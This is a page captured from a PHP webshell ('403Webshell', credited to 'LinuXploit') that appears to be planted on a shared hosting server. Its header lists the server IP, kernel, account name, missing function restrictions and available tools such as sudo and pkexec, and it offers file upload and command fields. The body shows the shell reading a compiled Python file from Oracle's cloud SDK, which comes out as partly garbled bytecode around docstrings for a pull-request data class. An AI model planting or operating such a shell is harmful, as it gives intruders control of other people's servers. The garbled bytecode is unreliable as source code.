403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/devops/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/devops/models/__pycache__/pull_request_summary.cpython-39.pyc
a

���f�X�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s8eZdZdZdd�Zedd��Zejdd��Zedd��Zejd	d��Zed
d��Z	e	jdd��Z	ed
d��Z
e
jdd��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Z
e
jdd��Z
edd��Zejdd��Zedd��Zejdd��Zedd ��Zejd!d ��Zed"d#��Zejd$d#��Zed%d&��Zejd'd&��Zed(d)��Zejd*d)��Zed+d,��Zejd-d,��Zed.d/��Zejd0d/��Zed1d2��Zejd3d2��Zed4d5��Zejd6d5��Zed7d8��Zejd9d8��Zed:d;��Zejd<d;��Zed=d>��Zejd?d>��Zd@dA�ZdBdC�ZdDdE�ZdFS)G�PullRequestSummaryz&
    Summary of the Pull Request.
    cKs�ddddddddddddddddddddd�|_dd	d
ddd
ddddddddddddddd�|_d|_d|_d|_d|_d|_d|_d|_d|_	d|_
d|_d|_d|_
d|_d|_d|_d|_d|_d|_d|_d|_dS)a�

        Initializes a new PullRequestSummary object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param id:
            The value to assign to the id property of this PullRequestSummary.
        :type id: str

        :param display_name:
            The value to assign to the display_name property of this PullRequestSummary.
        :type display_name: str

        :param compartment_id:
            The value to assign to the compartment_id property of this PullRequestSummary.
        :type compartment_id: str

        :param description:
            The value to assign to the description property of this PullRequestSummary.
        :type description: str

        :param repository_id:
            The value to assign to the repository_id property of this PullRequestSummary.
        :type repository_id: str

        :param source_repository_id:
            The value to assign to the source_repository_id property of this PullRequestSummary.
        :type source_repository_id: str

        :param source_branch:
            The value to assign to the source_branch property of this PullRequestSummary.
        :type source_branch: str

        :param destination_branch:
            The value to assign to the destination_branch property of this PullRequestSummary.
        :type destination_branch: str

        :param source_commit_id_at_termination:
            The value to assign to the source_commit_id_at_termination property of this PullRequestSummary.
        :type source_commit_id_at_termination: str

        :param merge_base_commit_id_at_termination:
            The value to assign to the merge_base_commit_id_at_termination property of this PullRequestSummary.
        :type merge_base_commit_id_at_termination: str

        :param time_created:
            The value to assign to the time_created property of this PullRequestSummary.
        :type time_created: datetime

        :param time_updated:
            The value to assign to the time_updated property of this PullRequestSummary.
        :type time_updated: datetime

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this PullRequestSummary.
        :type lifecycle_state: str

        :param lifecycle_details:
            The value to assign to the lifecycle_details property of this PullRequestSummary.
        :type lifecycle_details: str

        :param total_comments:
            The value to assign to the total_comments property of this PullRequestSummary.
        :type total_comments: int

        :param total_reviewers:
            The value to assign to the total_reviewers property of this PullRequestSummary.
        :type total_reviewers: int

        :param created_by:
            The value to assign to the created_by property of this PullRequestSummary.
        :type created_by: oci.devops.models.PrincipalDetails

        :param freeform_tags:
            The value to assign to the freeform_tags property of this PullRequestSummary.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this PullRequestSummary.
        :type defined_tags: dict(str, dict(str, object))

        :param system_tags:
            The value to assign to the system_tags property of this PullRequestSummary.
        :type system_tags: dict(str, dict(str, object))

        �strZdatetime�intZPrincipalDetailszdict(str, str)zdict(str, dict(str, object)))�id�display_name�compartment_id�description�
repository_id�source_repository_id�
source_branch�destination_branch�source_commit_id_at_termination�#merge_base_commit_id_at_termination�time_created�time_updated�lifecycle_state�lifecycle_details�total_comments�total_reviewers�
created_by�
freeform_tags�defined_tags�system_tagsr	ZdisplayNameZ
compartmentIdrZrepositoryIdZsourceRepositoryIdZsourceBranchZdestinationBranchZsourceCommitIdAtTerminationZmergeBaseCommitIdAtTerminationZtimeCreatedZtimeUpdatedZlifecycleStateZlifecycleDetailsZ
totalCommentsZtotalReviewersZ	createdByZfreeformTagsZdefinedTagsZ
systemTagsN)Z
swagger_typesZ
attribute_map�_id�
_display_name�_compartment_id�_description�_repository_id�_source_repository_id�_source_branch�_destination_branch� _source_commit_id_at_termination�$_merge_base_commit_id_at_termination�
_time_created�
_time_updated�_lifecycle_state�_lifecycle_details�_total_comments�_total_reviewers�_created_by�_freeform_tags�
_defined_tags�_system_tags)�self�kwargs�r3�J/usr/lib/python3.9/site-packages/oci/devops/models/pull_request_summary.py�__init__s|W��zPullRequestSummary.__init__cCs|jS)z�
        **[Required]** Gets the id of this PullRequestSummary.
        Unique identifier that is immutable on creation


        :return: The id of this PullRequestSummary.
        :rtype: str
        �r�r1r3r3r4r	�s
zPullRequestSummary.idcCs
||_dS)z�
        Sets the id of this PullRequestSummary.
        Unique identifier that is immutable on creation


        :param id: The id of this PullRequestSummary.
        :type: str
        Nr6)r1r	r3r3r4r	�s
cCs|jS)z�
        **[Required]** Gets the display_name of this PullRequestSummary.
        Pull Request title, can be renamed


        :return: The display_name of this PullRequestSummary.
        :rtype: str
        �rr7r3r3r4r
�s
zPullRequestSummary.display_namecCs
||_dS)z�
        Sets the display_name of this PullRequestSummary.
        Pull Request title, can be renamed


        :param display_name: The display_name of this PullRequestSummary.
        :type: str
        Nr8)r1r
r3r3r4r
�s
cCs|jS)z�
        **[Required]** Gets the compartment_id of this PullRequestSummary.
        Compartment Identifier


        :return: The compartment_id of this PullRequestSummary.
        :rtype: str
        �rr7r3r3r4r�s
z!PullRequestSummary.compartment_idcCs
||_dS)z�
        Sets the compartment_id of this PullRequestSummary.
        Compartment Identifier


        :param compartment_id: The compartment_id of this PullRequestSummary.
        :type: str
        Nr9)r1rr3r3r4r�s
cCs|jS)z�
        Gets the description of this PullRequestSummary.
        Details of the pull request. Avoid entering confidential information.


        :return: The description of this PullRequestSummary.
        :rtype: str
        �r r7r3r3r4r�s
zPullRequestSummary.descriptioncCs
||_dS)z�
        Sets the description of this PullRequestSummary.
        Details of the pull request. Avoid entering confidential information.


        :param description: The description of this PullRequestSummary.
        :type: str
        Nr:)r1rr3r3r4r�s
cCs|jS)z�
        **[Required]** Gets the repository_id of this PullRequestSummary.
        DevOps Repository Identifier


        :return: The repository_id of this PullRequestSummary.
        :rtype: str
        �r!r7r3r3r4r
s
z PullRequestSummary.repository_idcCs
||_dS)z�
        Sets the repository_id of this PullRequestSummary.
        DevOps Repository Identifier


        :param repository_id: The repository_id of this PullRequestSummary.
        :type: str
        Nr;)r1r
r3r3r4r
s
cCs|jS)a>
        Gets the source_repository_id of this PullRequestSummary.
        The OCID of the forked repository that will act as the source of the changes to be included in the pull request against the parent repository.


        :return: The source_repository_id of this PullRequestSummary.
        :rtype: str
        �r"r7r3r3r4r#s
z'PullRequestSummary.source_repository_idcCs
||_dS)aQ
        Sets the source_repository_id of this PullRequestSummary.
        The OCID of the forked repository that will act as the source of the changes to be included in the pull request against the parent repository.


        :param source_repository_id: The source_repository_id of this PullRequestSummary.
        :type: str
        Nr<)r1rr3r3r4r/s
cCs|jS)z�
        **[Required]** Gets the source_branch of this PullRequestSummary.
        The review branch which contains the changes to be reviewed.


        :return: The source_branch of this PullRequestSummary.
        :rtype: str
        �r#r7r3r3r4r;s
z PullRequestSummary.source_branchcCs
||_dS)z�
        Sets the source_branch of this PullRequestSummary.
        The review branch which contains the changes to be reviewed.


        :param source_branch: The source_branch of this PullRequestSummary.
        :type: str
        Nr=)r1rr3r3r4rGs
cCs|jS)z�
        **[Required]** Gets the destination_branch of this PullRequestSummary.
        The destination branch against which the changes are to be reviewed.


        :return: The destination_branch of this PullRequestSummary.
        :rtype: str
        �r$r7r3r3r4rSs
z%PullRequestSummary.destination_branchcCs
||_dS)a
        Sets the destination_branch of this PullRequestSummary.
        The destination branch against which the changes are to be reviewed.


        :param destination_branch: The destination_branch of this PullRequestSummary.
        :type: str
        Nr>)r1rr3r3r4r_s
cCs|jS)a#
        Gets the source_commit_id_at_termination of this PullRequestSummary.
        The source branch commit ID when the Pull Request status was last changed to merged or closed


        :return: The source_commit_id_at_termination of this PullRequestSummary.
        :rtype: str
        �r%r7r3r3r4rks
z2PullRequestSummary.source_commit_id_at_terminationcCs
||_dS)aA
        Sets the source_commit_id_at_termination of this PullRequestSummary.
        The source branch commit ID when the Pull Request status was last changed to merged or closed


        :param source_commit_id_at_termination: The source_commit_id_at_termination of this PullRequestSummary.
        :type: str
        Nr?)r1rr3r3r4rws
cCs|jS)a(
        Gets the merge_base_commit_id_at_termination of this PullRequestSummary.
        The merge base commit ID when the Pull Request status was last changed to merged or closed


        :return: The merge_base_commit_id_at_termination of this PullRequestSummary.
        :rtype: str
        �r&r7r3r3r4r�s
z6PullRequestSummary.merge_base_commit_id_at_terminationcCs
||_dS)aJ
        Sets the merge_base_commit_id_at_termination of this PullRequestSummary.
        The merge base commit ID when the Pull Request status was last changed to merged or closed


        :param merge_base_commit_id_at_termination: The merge_base_commit_id_at_termination of this PullRequestSummary.
        :type: str
        Nr@)r1rr3r3r4r�s
cCs|jS)a
        **[Required]** Gets the time_created of this PullRequestSummary.
        The time the the Pull Request was created. An RFC3339 formatted datetime string


        :return: The time_created of this PullRequestSummary.
        :rtype: datetime
        �r'r7r3r3r4r�s
zPullRequestSummary.time_createdcCs
||_dS)z�
        Sets the time_created of this PullRequestSummary.
        The time the the Pull Request was created. An RFC3339 formatted datetime string


        :param time_created: The time_created of this PullRequestSummary.
        :type: datetime
        NrA)r1rr3r3r4r�s
cCs|jS)z�
        Gets the time_updated of this PullRequestSummary.
        The time the Pull Request was updated. An RFC3339 formatted datetime string


        :return: The time_updated of this PullRequestSummary.
        :rtype: datetime
        �r(r7r3r3r4r�s
zPullRequestSummary.time_updatedcCs
||_dS)z�
        Sets the time_updated of this PullRequestSummary.
        The time the Pull Request was updated. An RFC3339 formatted datetime string


        :param time_updated: The time_updated of this PullRequestSummary.
        :type: datetime
        NrB)r1rr3r3r4r�s
cCs|jS)z�
        **[Required]** Gets the lifecycle_state of this PullRequestSummary.
        The current state of the Pull Request.


        :return: The lifecycle_state of this PullRequestSummary.
        :rtype: str
        �r)r7r3r3r4r�s
z"PullRequestSummary.lifecycle_statecCs
||_dS)z�
        Sets the lifecycle_state of this PullRequestSummary.
        The current state of the Pull Request.


        :param lifecycle_state: The lifecycle_state of this PullRequestSummary.
        :type: str
        NrC)r1rr3r3r4r�s
cCs|jS)z�
        **[Required]** Gets the lifecycle_details of this PullRequestSummary.
        The status of the Pull Request.


        :return: The lifecycle_details of this PullRequestSummary.
        :rtype: str
        �r*r7r3r3r4r�s
z$PullRequestSummary.lifecycle_detailscCs
||_dS)z�
        Sets the lifecycle_details of this PullRequestSummary.
        The status of the Pull Request.


        :param lifecycle_details: The lifecycle_details of this PullRequestSummary.
        :type: str
        NrD)r1rr3r3r4r�s
cCs|jS)z�
        **[Required]** Gets the total_comments of this PullRequestSummary.
        The total number of comments on the pull request.


        :return: The total_comments of this PullRequestSummary.
        :rtype: int
        �r+r7r3r3r4r�s
z!PullRequestSummary.total_commentscCs
||_dS)z�
        Sets the total_comments of this PullRequestSummary.
        The total number of comments on the pull request.


        :param total_comments: The total_comments of this PullRequestSummary.
        :type: int
        NrE)r1rr3r3r4rs
cCs|jS)z�
        **[Required]** Gets the total_reviewers of this PullRequestSummary.
        The total number of reviewers on the pull request.


        :return: The total_reviewers of this PullRequestSummary.
        :rtype: int
        �r,r7r3r3r4rs
z"PullRequestSummary.total_reviewerscCs
||_dS)z�
        Sets the total_reviewers of this PullRequestSummary.
        The total number of reviewers on the pull request.


        :param total_reviewers: The total_reviewers of this PullRequestSummary.
        :type: int
        NrF)r1rr3r3r4rs
cCs|jS)z�
        **[Required]** Gets the created_by of this PullRequestSummary.

        :return: The created_by of this PullRequestSummary.
        :rtype: oci.devops.models.PrincipalDetails
        �r-r7r3r3r4r+szPullRequestSummary.created_bycCs
||_dS)z�
        Sets the created_by of this PullRequestSummary.

        :param created_by: The created_by of this PullRequestSummary.
        :type: oci.devops.models.PrincipalDetails
        NrG)r1rr3r3r4r5scCs|jS)a�
        **[Required]** Gets the freeform_tags of this PullRequestSummary.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.  See `Resource Tags`__. Example: `{"bar-key": "value"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this PullRequestSummary.
        :rtype: dict(str, str)
        �r.r7r3r3r4r?sz PullRequestSummary.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this PullRequestSummary.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.  See `Resource Tags`__. Example: `{"bar-key": "value"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this PullRequestSummary.
        :type: dict(str, str)
        NrH)r1rr3r3r4rMscCs|jS)a�
        **[Required]** Gets the defined_tags of this PullRequestSummary.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__. Example: `{"foo-namespace": {"bar-key": "value"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this PullRequestSummary.
        :rtype: dict(str, dict(str, object))
        �r/r7r3r3r4r[szPullRequestSummary.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this PullRequestSummary.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__. Example: `{"foo-namespace": {"bar-key": "value"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this PullRequestSummary.
        :type: dict(str, dict(str, object))
        NrI)r1rr3r3r4riscCs|jS)a�
        **[Required]** Gets the system_tags of this PullRequestSummary.
        Usage of system tag keys. These predefined keys are scoped to namespaces. See `Resource Tags`__. Example: `{"orcl-cloud": {"free-tier-retained": "true"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The system_tags of this PullRequestSummary.
        :rtype: dict(str, dict(str, object))
        �r0r7r3r3r4rwszPullRequestSummary.system_tagscCs
||_dS)a�
        Sets the system_tags of this PullRequestSummary.
        Usage of system tag keys. These predefined keys are scoped to namespaces. See `Resource Tags`__. Example: `{"orcl-cloud": {"free-tier-retained": "true"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param system_tags: The system_tags of this PullRequestSummary.
        :type: dict(str, dict(str, object))
        NrJ)r1rr3r3r4r�scCst|�S�N)rr7r3r3r4�__repr__�szPullRequestSummary.__repr__cCs|durdS|j|jkS)NF)�__dict__�r1�otherr3r3r4�__eq__�szPullRequestSummary.__eq__cCs
||kSrKr3rNr3r3r4�__ne__�szPullRequestSummary.__ne__N)�__name__�
__module__�__qualname__�__doc__r5�propertyr	�setterr
rrr
rrrrrrrrrrrrrrrrLrPrQr3r3r3r4rs�
































	
	











rN)Zoci.utilrrrZoci.decoratorsr�objectrr3r3r3r4�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit